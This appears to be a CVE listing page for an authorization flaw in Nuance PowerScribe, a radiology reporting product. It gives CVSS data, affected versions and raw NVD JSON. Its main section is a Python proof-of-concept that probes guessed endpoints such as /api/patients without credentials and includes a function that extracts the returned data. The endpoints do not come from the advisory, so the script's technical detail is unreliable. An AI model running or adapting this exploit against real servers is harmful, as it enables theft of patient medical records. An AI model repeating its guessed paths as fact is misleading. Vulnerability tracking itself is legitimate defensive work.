Security Vulnerability Report
CVE-2025-30398 CVSS 8.1 HIGH

CVE-2025-30398

Published: 2025-11-11 18:15:35
Last Modified: 2026-02-12 17:20:07

Description

Missing authorization in Nuance PowerScribe allows an unauthorized attacker to disclose information over a network.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.5:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.7:*:*:*:*:*:*:* - VULNERABLE
Nuance PowerScribe report management system (specific versions pending official confirmation)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-30398 PoC - Nuance PowerScribe Authorization Bypass
# Target: Nuance PowerScribe vulnerable endpoint

TARGET_HOST = "https://vulnerable-powerscribe-server.com"


def check_vulnerability():
    """
    Check if the target Nuance PowerScribe installation is vulnerable
    to CVE-2025-30398 (Missing Authorization)
    """
    # Attempt to access sensitive endpoint without authentication
    sensitive_endpoints = [
        "/api/reports",
        "/api/patients",
        "/api/studies",
        "/api/radiologists",
        "/api/reports/pending"
    ]

    for endpoint in sensitive_endpoints:
        url = f"{TARGET_HOST}{endpoint}"
        try:
            # Send unauthenticated request
            response = requests.get(url, timeout=10, verify=False)

            # Check if we can access the endpoint without authorization
            if response.status_code == 200:
                print(f"[+] VULNERABLE: {endpoint} accessible without auth")
                print(f" Status: {response.status_code}")
                print(f" Content-Length: {len(response.content)}")
                return True
            elif response.status_code == 401:
                print(f"[-] Protected: {endpoint} requires auth")
            else:
                print(f"[*] Endpoint: {endpoint} returned {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error accessing {endpoint}: {e}")

    return False


def exploit_information_disclosure(endpoint):
    """
    Exploit CVE-2025-30398 to extract sensitive information
    """
    url = f"{TARGET_HOST}{endpoint}"
    response = requests.get(url, timeout=10, verify=False)

    if response.status_code == 200:
        # Parse and return sensitive data
        return response.json()
    return None


if __name__ == "__main__":
    print("CVE-2025-30398 - Nuance PowerScribe Authorization Bypass PoC")
    print("=" * 60)

    if check_vulnerability():
        print("\n[!] Target appears to be vulnerable to CVE-2025-30398")
        print("[!] Immediate patching recommended")
    else:
        print("\n[+] Target does not appear to be vulnerable")
```

References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30398 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30398", "sourceIdentifier": "[email protected]", "published": "2025-11-11T18:15:35.107", "lastModified": "2026-02-12T17:20:07.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing authorization in Nuance PowerScribe allows an unauthorized attacker to disclose information over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "8ED622CE-D7FD-4B2D-BC99-168D521B3FD4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "E9F234B2-C4BA-44DD-A128-6BFF4576F7AB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.5:*:*:*:*:*:*:*", "matchCriteriaId": 
"147DD7CE-53EC-42C7-A966-06015CB6F07E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "C1D336CD-A318-45CD-BDC1-1C0BE9D7A161"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "1A881533-9A47-4A01-B9F6-841E656DBC33"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "000EECC0-C95A-4D81-BDA8-5166F9B04F02"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.9:*:*:*:*:*:*:*", "matchCriteriaId": "C180424A-9E0B-432D-8192-BBA1ADA5EE8F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.1:*:*:*:*:*:*:*", "matchCriteriaId": "62329468-E85C-4A3C-A0BF-8BA11941DED5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.2:*:*:*:*:*:*:*", "matchCriteriaId": "3EDC600D-8637-4BAB-AC7D-A9D95B03DAB9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.3:*:*:*:*:*:*:*", "matchCriteriaId": "47AC5A9D-8016-4BDB-9D8F-098CFD93855A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.4:*:*:*:*:*:*:*", "matchCriteriaId": "9B6B794A-C467-411D-9468-A7ADDA7D6157"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.5:*:*:*:*:*:*:*", "matchCriteriaId": "870B35F1-75F2-4EBB-A4C5-F6C3118BBC25"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.6:*:*:*:*:*:*:*", "matchCriteriaId": "548FC39C-8C08-4285-A5FC-0785738C4471"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.7:*:*:*:*:*:*:*", "matchCriteriaId": "4F44CAAE-A020-4F81-BF96-48F9D6559A7D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.8:*:*:*:*:*:*:*", "matchCriteriaId": "EA71CDB3-269C-4EE8-9F46-FD7CC1284B9C"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.9:*:*:*:*:*:*:*", "matchCriteriaId": "F374C80B-0336-4687-879B-1745234B9E37"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.10:*:*:*:*:*:*:*", "matchCriteriaId": "682143B4-04BA-4C11-AAE8-E687B6BE4688"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2023.1:sp2_patch_7:*:*:*:*:*:*", "matchCriteriaId": "AA5407C0-0336-4055-BD18-EA68C7C40218"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30398", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}